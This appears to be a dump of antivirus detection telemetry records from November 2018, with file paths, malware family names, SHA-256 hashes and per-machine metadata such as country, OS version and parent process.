  Row(detection=Row(filename='in_cdda.dll', filepath='C:\\Program Files (x86)\\Winamp\\Plugins\\in_cdda.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='1a1041c8595122105905c56fee9ca4f9648260e6b2e726bedc6b32b8bf9d4c91', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T23:32:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T15:19:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213924-e2e81cbb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e1e6ba50\\AVSCAN-20181101-213905-DF6AB5CC\\AVSCAN-20181101-213924-E2E81CBB', filesize=1536000, name='TR/Crypt.TPM.Gen.#M1.#R1'), hash='08af53c69828cc5c898e7047a1a410ce7f1b380464b7a82fcfa75e6925ba45a5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:39:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095027-c2da2e53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-094836-AAD64268\\AVSCAN-20181101-095027-C2DA2E53', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:53:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213234-3a2dbb4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213234-3A2DBB4C', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:32:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:52:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information                                   .scr', filepath='E:\\System Volume Information                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150517-c930cf43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150517-C930CF43', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:05:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='proyecto                                   .scr', filepath='E:\\Proyecto                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\emffspaaiuh\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T06:44:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:42:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e7ebc6939e62b84655c8370ecb295e5ac5a4b0abf8567d757adff10f0aa29b9d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\E7EBC6939E62B84655C8370ECB295E5AC5A4B0ABF8567D757ADFF10F0AA29B9D', filesize=160000, name='TR/Dropper.Gen.#M300.#R2287'), hash='e7ebc6939e62b84655c8370ecb295e5ac5a4b0abf8567d757adff10f0aa29b9d', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:49:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b82265ef0bcfa2df852e2a1c0919268c2a6e676a3d6dc7544d7c8e5a9632704f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\B82265EF0BCFA2DF852E2A1C0919268C2A6E676A3D6DC7544D7C8E5A9632704F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b82265ef0bcfa2df852e2a1c0919268c2a6e676a3d6dc7544d7c8e5a9632704f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145857-805e9e65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145857-805E9E65', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dtsu2pausrv32.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Audio_wnt6-x86_1111\\drp\\x86\\S\\Realtek\\2\\DTSU2PAuSrv32.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='9747165e934ea35cceeff9e433b43095b25b52a5842a96643eaba52e88b70fc0', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Common Files\\Wondershare\\Wondershare Helper Compact\\WSHelper.exe', parentsize=2062336, timestamp='2018-11-01T15:08:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154617-cf5e2408', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154617-CF5E2408', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='eed54a19f0c314e6b4e308d8403b84f795895912b71aef72ef528f7d5dc43734', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T15:00:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095620-873d20e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095620-873D20E5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:56:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081759-52a72a0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-081640-431A7124\\AVSCAN-20181101-081759-52A72A0F', filesize=320000, name='TR/Black.Gen2.#M1.#R1'), hash='a6e72df8ccc11a35e64106d808aad51944b2c3ca470a8d6034e0437702dcb7d6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:18:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='terza.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\tutto informatica engim\\ESERCIZI INFORMATICA\\esercizi vari\\TERZA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:31:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='error_log.exe', filepath='G:\\Blank\\OSMSSPACE\\Error_Log\\Error_Log.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:38:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235713-032c7654', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-235713-032C7654', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:54:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maphwdygbinotm.bat', filepath='C:\\maphwdygbinotm.bat', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='install_virtualdj_home_v7.0.5.exe', filepath='\\\\?\\I:\\files\\soft\\install_virtualdj_home_v7.0.5.exe', filesize=36608000, name='TR/Patched.Gen.#M300.#R2947'), hash='a17436293e6f1d060337bfc5cf947019d393cbcb86063b116a058b0722a98925', metadata=Row(cmdline=None, country='KE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:35:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iycufpgl.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\IycUfpgL.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-064013-2777ff0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_61278a58\\AVSCAN-20181104-063957-2551AB9C\\AVSCAN-20181104-064013-2777FF0A', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:40:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='isnpbu.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\isnpbu.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='01766c45d95807f53617e7b39a692d510e4dbdd220ca7aed44bd852ed782ace5', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:03:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T20:10:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\aol\\2\\1\\1\\2\\2\\1\\1\\1\\1\\1\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.71.#M1.#R1'), hash='298cbe85ed29c3da3c0911f41b694304300d80e5b7bb00626165260169b0ac87', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131446-2732b406', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131446-2732B406', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:14:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dreieck-1x1_setup_de.exe', filepath='\\\\?\\H:\\Sicherung\\09-06-2013\\Downloads\\dreieck-1x1_setup_de.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='20cc89b59655df37ebfbbd286636f4060872f1b81f206b2fe2440c4b4306c74a', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:52:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:01:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:25:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='91ece29a3da27d43701fc891336b2fd2cb8022cb294764307dac7c9858727486', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001f493', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f493', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:22:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2649704\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T02:37:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='acceso.exe', filepath='D:\\Programas\\progr sena\\software 2018\\vs 216\\-NET Y JAVA\\. NET Y JAVA\\TRABAJOS.NET\\M-GRAFICAS\\Acceso\\Acceso\\bin\\Debug\\Acceso.exe', filesize=64000, name='HEUR/AGEN.1005197.#M1.#R1'), hash='6e0caa3a52c9120d42300ffe486ad13556ec31bde1d337ab4cf1c2b282e3afad', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T20:10:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162402-f8e216a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-162402-F8E216A3', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:24:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243de', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243de', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:49:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-222230-766e9873', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6931b99d\\AVSCAN-20181104-221652-2BB38B21\\AVSCAN-20181104-222230-766E9873', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:22:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230409-34579cff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-230409-34579CFF', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='z8j7cvbc5.exe', filepath='\\\\?\\C:\\Program Files\\Z8J7CVBC5R\\Z8J7CVBC5.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:35:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zemax.exe', filepath='\\\\?\\E:\\迅雷下载\\Zemax V13 R2 SP4 x64\\z132sp4_x64_crack\\zemax.exe', filesize=17536000, name='W32/Infector.Gen8.#M300.#R700734'), hash='5dd017a7cf6dd69056bbd2dbef9d18fc224217d502c25efd60e1504f47b24705', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:22:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='frostwire-5.3.6.windows-downloader.exe', filepath='C:\\Program Files\\Diverses\\Software\\frostwire-5.3.6.windows-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='1dfb9b273523734a1eb28d1def40702e9e60c6cddea1a9563407865837aa4c23', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Q-Dir\\Q-Dir.exe', parentsize=786432, timestamp='2018-11-04T17:04:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tập đọc 1 r.exe', filepath='f:\\\xa0\\3c\\Tập đọc 1 R.exe', filesize=2304000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='44f644e5f91b7d6580faf9ccd8002ce9c937d1043af5ba240f585897e56912aa', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:32:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T13:27:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bg.js', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Alte Firefox-Daten\\rpt2jo1g.default\\extensions\\iu1@uZir3gkI.com\\content\\bg.js', filesize=32000, name='HTML/ExpKit.Gen2.#M1.#R1'), hash='1ad52e8aba705849071528eea3cb7d3c5e543c18db0d4dd0ff1c1e8daec0a7bf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:34:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:20:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T01:14:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='claw.exe', filepath="D:\\العاب\\small games\\Claw Collector's Edition\\CLAW.EXE", filesize=1408000, name='W32/Jeefo.A.#M1.#R1'), hash='9acaee1598f1e925375e721f9556002f22cec1f7642a260cf2b0c1451b72a02f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.exe', parentsize=36352, timestamp='2018-11-04T12:57:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bb24f754e5fcfde6f25ec9ec7acb606f75ec2122b50cd73a8bf0592b320c0c01', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\BB24F754E5FCFDE6F25EC9EC7ACB606F75EC2122B50CD73A8BF0592B320C0C01', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bb24f754e5fcfde6f25ec9ec7acb606f75ec2122b50cd73a8bf0592b320c0c01', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:58:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b1cac128b6acbc9b5c934f70b5c11455de30dd3a651e6891cbb8bc76f5bb5f9d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B1CAC128B6ACBC9B5C934F70B5C11455DE30DD3A651E6891CBB8BC76F5BB5F9D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b1cac128b6acbc9b5c934f70b5c11455de30dd3a651e6891cbb8bc76f5bb5f9d', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:50:44Z'), dt=datetime.date(2018, 11, 4)),
